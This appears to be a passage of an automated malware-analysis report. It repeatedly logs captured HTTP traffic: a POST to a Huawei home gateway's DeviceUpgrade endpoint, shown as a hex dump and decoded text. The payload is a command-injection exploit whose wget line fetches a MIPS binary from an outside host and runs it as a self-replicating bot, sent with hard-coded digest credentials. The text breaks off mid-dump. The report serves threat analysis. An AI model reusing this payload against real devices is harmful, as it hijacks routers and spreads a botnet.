20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 